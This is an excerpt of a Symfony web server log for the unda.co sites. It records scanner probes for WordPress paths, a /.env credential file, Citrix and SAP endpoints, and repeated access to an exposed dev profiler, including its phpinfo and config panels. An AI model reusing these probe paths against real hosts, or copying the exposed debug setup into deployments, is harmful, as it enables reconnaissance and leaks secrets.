  4790. [2025-12-19 02:41:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4791. [2025-12-19 02:41:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4792. [2025-12-19 02:41:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4793. [2025-12-19 02:41:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4794. [2025-12-19 02:41:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4795. [2025-12-19 02:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4796. [2025-12-19 02:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4797. [2025-12-19 02:41:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4798. [2025-12-19 02:41:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4799. [2025-12-19 02:41:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4800. [2025-12-19 02:41:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4801. [2025-12-19 02:41:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4802. [2025-12-19 02:41:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4803. [2025-12-19 02:41:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"599e8a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/599e8a?panel=form","method":"GET"} []
  4804. [2025-12-19 02:41:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4805. [2025-12-19 02:43:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1bbb51","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1bbb51","method":"GET"} []
  4806. [2025-12-19 02:43:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4807. [2025-12-19 02:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4808. [2025-12-19 02:44:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  4809. [2025-12-19 02:45:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4810. [2025-12-19 02:45:42] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  4811. [2025-12-19 02:45:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  4812. [2025-12-19 02:45:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4813. [2025-12-19 02:45:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4814. [2025-12-19 02:45:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4815. [2025-12-19 02:45:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4816. [2025-12-19 02:45:42] security.DEBUG: Calling Authentication entry point. [] []
  4817. [2025-12-19 02:45:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  4818. [2025-12-19 02:46:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=request","method":"GET"} []
  4819. [2025-12-19 02:46:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4820. [2025-12-19 02:51:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"afab25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/afab25?panel=cache","method":"GET"} []
  4821. [2025-12-19 02:51:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4822. [2025-12-19 02:54:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4823. [2025-12-19 02:54:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4824. [2025-12-19 02:54:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4825. [2025-12-19 02:54:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4826. [2025-12-19 02:54:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4827. [2025-12-19 02:54:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4828. [2025-12-19 02:54:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4829. [2025-12-19 02:54:58] security.DEBUG: Calling Authentication entry point. [] []
  4830. [2025-12-19 02:56:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=twig","method":"GET"} []
  4831. [2025-12-19 02:56:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4832. [2025-12-19 03:05:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4833. [2025-12-19 03:05:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4834. [2025-12-19 03:06:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02668c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/02668c?panel=swiftmailer","method":"GET"} []
  4835. [2025-12-19 03:06:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  4836. [2025-12-19 03:06:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=time","method":"GET"} []
  4837. [2025-12-19 03:06:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4838. [2025-12-19 03:07:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323","method":"GET"} []
  4839. [2025-12-19 03:07:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4840. [2025-12-19 03:11:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4841. [2025-12-19 03:11:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=security","method":"GET"} []
  4842. [2025-12-19 03:11:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4843. [2025-12-19 03:17:37] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4844. [2025-12-19 03:21:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
  4845. [2025-12-19 03:21:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4846. [2025-12-19 03:28:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=time","method":"GET"} []
  4847. [2025-12-19 03:28:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4848. [2025-12-19 03:29:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /logon/LogonPoint/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /logon/LogonPoint/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4849. [2025-12-19 03:29:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /logon/LogonPoint/custom.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /logon/LogonPoint/custom.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4850. [2025-12-19 03:33:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4851. [2025-12-19 03:35:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3","method":"GET"} []
  4852. [2025-12-19 03:35:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4853. [2025-12-19 03:39:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=config","method":"GET"} []
  4854. [2025-12-19 03:39:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4855. [2025-12-19 03:46:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4856. [2025-12-19 03:47:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  4857. [2025-12-19 03:47:19] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a666a7","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/a666a7","method":"GET"} []
  4858. [2025-12-19 03:47:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
  4859. [2025-12-19 03:47:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4860. [2025-12-19 03:48:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=cache","method":"GET"} []
  4861. [2025-12-19 03:48:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4862. [2025-12-19 03:48:47] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  4863. [2025-12-19 03:48:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4864. [2025-12-19 03:48:59] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  4865. [2025-12-19 03:48:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  4866. [2025-12-19 03:48:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4867. [2025-12-19 03:48:59] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4868. [2025-12-19 03:48:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4869. [2025-12-19 03:48:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4870. [2025-12-19 03:48:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4871. [2025-12-19 03:48:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4872. [2025-12-19 03:48:59] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4873. [2025-12-19 03:48:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4874. [2025-12-19 03:48:59] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4875. [2025-12-19 03:48:59] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4876. [2025-12-19 03:48:59] security.DEBUG: Calling Authentication entry point. [] []
  4877. [2025-12-19 03:48:59] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4878. [2025-12-19 03:48:59] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4879. [2025-12-19 03:48:59] security.DEBUG: Calling Authentication entry point. [] []
